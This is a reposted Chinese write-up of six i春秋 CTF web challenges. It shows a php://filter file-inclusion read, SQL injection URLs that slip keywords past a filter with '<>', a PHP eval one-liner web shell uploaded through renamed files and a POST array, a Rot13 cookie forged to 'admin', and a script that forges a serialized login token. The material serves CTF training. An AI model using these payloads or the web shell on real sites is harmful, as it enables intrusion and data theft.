I春秋CTF训练营web题解(一)

2024-02-26 13:08
文章标签 web 训练营 ctf 题解 春秋

本文主要是介绍I春秋CTF训练营web题解(一),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

I春秋CTF训练营web题解(一)

(1)include

==hint:没错!就是文件包含漏洞.==

点开链接,发现

PzPytJ.md.png

通过源码可知可以提交一个path的变量,通过ctrl+f搜索allow_url_include,发现是打开状态:

PzPvB8.md.png

所以打开火狐浏览器,用hackbar工具输入:

PzipNQ.png

发现存在疑似含有flag的文件

Pzikj0.png

接着使用php://filter协议查看曝露出来的文件的内容,因为PHP文件是在不能直接显示的,所以使用了base64编码显示

PziJHO.png

然后解码就可以得到flag了

Pziw8A.md.png

(2)SQL

==hint:出题人就告诉你这个是个注入,有种别走!==

创建链接点进去,然后查看源码

Pzemss.md.png

很明显知道用sql注入,用火狐hackbar进行手动注入,先爆字段

http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 order by 4

Pze1iT.md.png

说明存在过滤,试试/**/,关键词大写,不行,然后尝试<>发现可以

http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 ord<>er by 4

PzeNLR.md.png

没出现结果,所以接下来继续爆字段,4不对就二分法换2,然后发现还是没结果,换3有了

http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 ord<>er by 2
http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 ord<>er by 3

Pzeae1.md.png

然后输入

http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 union se<>lect 1,2,3 from info

PzeWwt.png

说明第二个字段可以显示,那么接下来就是爆数据库名,表名,列名:

①爆数据库名

http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 union se<>lect 1,database(),3 from info

②爆表名

http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 union se<>lect 1,table_name,3 from information_schema.tables where table_schema='sqli'

③爆列名

http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 union se<>lect 1,column_name,3 from information_schema.columns where table_name='sqli'

发现疑似存在flag的列

http://4416038693a84c979b378d558565548a72402f0bf1e44e3d.game.ichunqiu.com/index.php?id=1 union se<>lect 1,flAg_T5ZNdrm,3 from sqli.info

flag就出来了。

(3)Do you know upload

==hint:加油吧,少年。==

创建链接,点开

Pzs8hV.png

很明显文件上传,试着上传已经写好的PHP一句话木马

<?php eval($_POST['a']);?>

然后改为jpg格式上传抓包,并改为php后缀就可以成功上传。

PzsBA1.png

因为我之前已经成功上传过了1.php文件,显示已存在,如果是第一次上传就会显示路径:upload/1.php

PzsLuQ.png

然后就是菜刀连接,打开

PzypCV.md.png

发现config.php和ctf.sql,flag应该存在数据库中,点开config.php可以看到数据库的信息

然后用菜刀编写shell连接到数据库查看flag。

(4)broken

==hint:you got a file,but…==

点开链接,发现file是个超链接,点进去

一看jother编码,放进浏览器控制台,发现末尾少了一个],加上后出现错误

于是删除最后面的(),再次输入得到[Array(1)],打开就可以看到flag了。

(5)who are you?

==hint:我是谁,我在哪,我要做什么?==

点开链接进去,显示

然后抓包发现cookie参数有问题

猜测是base64编码,拿去解码得

是Rot13,运行脚本解码得到guest,尝试将guest换成admin用脚本进行Rot13加密得到Zjo1OiJucXp2YSI7,再重新放入cookie中

可以看到已经成功登陆并且说可以上传,旁边有一条注释

<!-- $filename = $_POST['filename']; $data = $_POST['data']; -->

所以将请求包改成POST形式,然后输入

filename=2.php&data[]=<?php eval($_POST['a']);?>

再次提交

找到路径,输入进去看看就可以得到flag。

(6)Login

==hint:加油,我看好你==

点开链接,是一个登录界面

做web题习惯性的点开页面源代码看,发现一行注释,虽然在页面下面

猜测是账号密码,输入登录发现成功登录,然而登录了并没有什么东西,抓包看看

发现member.php这页刷新返回包中有一个show参数,猜测可以show source,所以改包,加上一个show参数并设为1

发现真的出现了源码

if(isset($requset['token'])){$login = unserialize(gzuncompress(base64_decode($requset['token'])));$db = new db();$row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');if($login['user'] === 'ichunqiu'){echo $flag;}else if($row['pass'] !== $login['pass']){echo 'unserialize injection!!';}else{echo "(╯‵□′)╯︵┴─┴ ";}

重要的就是这段,编写代码

<?php
$a=array('user'=>'ichunqiu');
$a=base64_encode(gzcompress(serialize($a)));
echo $a
?>

运行得到token

然后放到cookie中提交就可以得到flag。

这篇关于I春秋CTF训练营web题解(一)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/748966

相关文章

python web 开发之Flask中间件与请求处理钩子的最佳实践

《pythonweb开发之Flask中间件与请求处理钩子的最佳实践》Flask作为轻量级Web框架,提供了灵活的请求处理机制,中间件和请求钩子允许开发者在请求处理的不同阶段插入自定义逻辑,实现诸如... 目录Flask中间件与请求处理钩子完全指南1. 引言2. 请求处理生命周期概述3. 请求钩子详解3.1

SpringBoot项目Web拦截器使用的多种方式

《SpringBoot项目Web拦截器使用的多种方式》在SpringBoot应用中,Web拦截器(Interceptor)是一种用于在请求处理的不同阶段执行自定义逻辑的机制,下面给大家介绍Sprin... 目录一、实现 HandlerInterceptor 接口1、创建HandlerInterceptor实

Web技术与Nginx网站环境部署教程

《Web技术与Nginx网站环境部署教程》:本文主要介绍Web技术与Nginx网站环境部署教程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、Web基础1.域名系统DNS2.Hosts文件3.DNS4.域名注册二.网页与html1.网页概述2.HTML概述3.

Python使用Reflex构建现代Web应用的完全指南

《Python使用Reflex构建现代Web应用的完全指南》这篇文章为大家深入介绍了Reflex框架的设计理念,技术特性,项目结构,核心API,实际开发流程以及与其他框架的对比和部署建议,感兴趣的小伙... 目录什么是 ReFlex?为什么选择 Reflex?安装与环境配置构建你的第一个应用核心概念解析组件

Nginx使用Keepalived部署web集群(高可用高性能负载均衡)实战案例

《Nginx使用Keepalived部署web集群(高可用高性能负载均衡)实战案例》本文介绍Nginx+Keepalived实现Web集群高可用负载均衡的部署与测试,涵盖架构设计、环境配置、健康检查、... 目录前言一、架构设计二、环境准备三、案例部署配置 前端 Keepalived配置 前端 Nginx

JSON Web Token在登陆中的使用过程

《JSONWebToken在登陆中的使用过程》:本文主要介绍JSONWebToken在登陆中的使用过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录JWT 介绍微服务架构中的 JWT 使用结合微服务网关的 JWT 验证1. 用户登录,生成 JWT2. 自定义过滤

一文教你如何将maven项目转成web项目

《一文教你如何将maven项目转成web项目》在软件开发过程中,有时我们需要将一个普通的Maven项目转换为Web项目,以便能够部署到Web容器中运行,本文将详细介绍如何通过简单的步骤完成这一转换过程... 目录准备工作步骤一:修改​​pom.XML​​1.1 添加​​packaging​​标签1.2 添加

web网络安全之跨站脚本攻击(XSS)详解

《web网络安全之跨站脚本攻击(XSS)详解》:本文主要介绍web网络安全之跨站脚本攻击(XSS)的相关资料,跨站脚本攻击XSS是一种常见的Web安全漏洞,攻击者通过注入恶意脚本诱使用户执行,可能... 目录前言XSS 的类型1. 存储型 XSS(Stored XSS)示例:危害:2. 反射型 XSS(Re

解决JavaWeb-file.isDirectory()遇到的坑问题

《解决JavaWeb-file.isDirectory()遇到的坑问题》JavaWeb开发中,使用`file.isDirectory()`判断路径是否为文件夹时,需要特别注意:该方法只能判断已存在的文... 目录Jahttp://www.chinasem.cnvaWeb-file.isDirectory()遇

JavaWeb-WebSocket浏览器服务器双向通信方式

《JavaWeb-WebSocket浏览器服务器双向通信方式》文章介绍了WebSocket协议的工作原理和应用场景,包括与HTTP的对比,接着,详细介绍了如何在Java中使用WebSocket,包括配... 目录一、概述二、入门2.1 POM依赖2.2 编写配置类2.3 编写WebSocket服务2.4 浏